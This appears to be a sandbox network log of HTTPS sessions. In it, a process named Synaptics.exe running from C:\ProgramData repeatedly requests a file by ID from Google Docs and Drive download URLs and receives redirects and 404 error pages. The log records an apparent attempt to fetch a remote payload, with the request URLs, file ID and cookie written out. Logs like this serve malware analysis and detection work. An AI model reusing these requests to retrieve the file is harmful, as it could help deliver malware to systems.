                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-jdX-JH2KZ9N2-ZTF924osA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:45 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                    2024-12-30 03:59:45 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 65 57 4f 73 45 45 58 54 34 53 69 61 63 79 54 5f 50 31 7a 43 6d 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="eWOsEEXT4SiacyT_P1zCmA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                    2024-12-30 03:59:45 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    136192.168.2.449939142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:45 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:45 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC70HHyfttWFnYeelbZ3SV0rZihDYIfyEBp1QQQpYIp7u-kqjNuua-ugGzVloeePY-lE
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:45 GMT
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-_5AvQZMnxVXeCnXSGfwdhQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:45 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                    2024-12-30 03:59:45 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 41 68 6f 61 62 58 70 49 32 6c 2d 4d 5f 75 49 46 37 70 53 6f 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="HAhoabXpI2l-M_uIF7pSoA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                    2024-12-30 03:59:45 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    137192.168.2.449942142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:46 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:46 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:46 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-QkoLS4_MZPcdmW50QHTLDw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    138192.168.2.449941142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:46 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    139192.168.2.449943142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:46 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    140192.168.2.449944142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:46 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    141192.168.2.449947142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:47 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:47 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:47 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-K1KtW98Mp-I4ZT0dOhBwNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    142192.168.2.449949142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:47 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:47 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC7mvEOf972L3aJqtsYq6boVPpNe7EAHY2MpEzyaLbNDENn3FOy9m01YTUVYE68crJkKoqhDsYY
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:47 GMT
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-pButS8NVCnEgLrjmwBdgPg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:47 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                    2024-12-30 03:59:47 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 43 63 32 58 63 65 53 6a 76 78 35 51 6a 6c 70 35 2d 43 55 79 62 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="Cc2XceSjvx5Qjlp5-CUybw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                    2024-12-30 03:59:47 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    143192.168.2.449948142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:47 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:47 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:47 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-XkwIP5uVCVybJP_4Zn-lRg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    144192.168.2.449950142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:48 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:48 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:48 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
